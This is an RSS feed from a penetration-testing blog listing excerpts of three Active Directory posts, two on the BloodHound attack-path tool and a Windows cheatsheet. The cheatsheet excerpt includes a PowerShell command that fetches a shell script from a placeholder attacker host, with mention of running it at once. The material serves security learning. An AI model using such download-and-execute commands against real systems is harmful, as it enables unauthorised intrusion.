<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>AD on gkourgkoutas.net</title>
    <link>https://gkourgkoutas.net/en/tags/ad/</link>
    <description>Recent content in AD on gkourgkoutas.net</description>
    <generator>Hugo -- gohugo.io</generator>
    <lastBuildDate>Mon, 15 Nov 2021 18:37:00 +0100</lastBuildDate><atom:link href="https://gkourgkoutas.net/en/tags/ad/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>BloodHound Part II</title>
      <link>https://gkourgkoutas.net/en/posts/bloodhound-part-2/</link>
      <pubDate>Mon, 15 Nov 2021 18:37:00 +0100</pubDate>
      
      <guid>https://gkourgkoutas.net/en/posts/bloodhound-part-2/</guid>
      <description>The first part of my BloodHound post was about the setup and usage of the tool. This part will mainly focous on the built-in queries and some small tips and tricks. I think the only way to fully grasp BloodHound is by frequently using it.
Built-in queries After dumping our raw data with SharpHound1, it&amp;rsquo;s time to get to work. BH has some built-in queries which helps us to get a quick overview of the domain we are facing.</description>
    </item>
    
    <item>
      <title>Windows Cheatsheet</title>
      <link>https://gkourgkoutas.net/en/posts/windows-cheats/</link>
      <pubDate>Mon, 22 Mar 2021 19:21:03 +0100</pubDate>
      
      <guid>https://gkourgkoutas.net/en/posts/windows-cheats/</guid>
      <description>So this is the windows equivalent of my post about linux cheatsheets. A lot of the following commands are from labs, cheatsheets, writeups, from friends and colleagues, trial and error and also copied from famous places like hacktricks and ired.team.
I also have grepable cheatsheets to download on my GitHub.
Powershell Download from remote Webserver
PS&amp;gt; Invoke-WebRequest -Uri &amp;#34;http://&amp;lt;ip&amp;gt;:&amp;lt;port&amp;gt;/shell.ps1.&amp;#34; -OutFile &amp;#34;C:\path\file&amp;#34; With the following command, Powershell downloads the file and executes it immediately</description>
    </item>
    
    <item>
      <title>BloodHound Part I</title>
      <link>https://gkourgkoutas.net/en/posts/bloodhound-part-1/</link>
      <pubDate>Sat, 20 Mar 2021 11:53:00 +0100</pubDate>
      
      <guid>https://gkourgkoutas.net/en/posts/bloodhound-part-1/</guid>
      <description>What is BloodHound?  BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a PowerShell ingestor.
  BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths.</description>
    </item>
    
  </channel>
</rss>
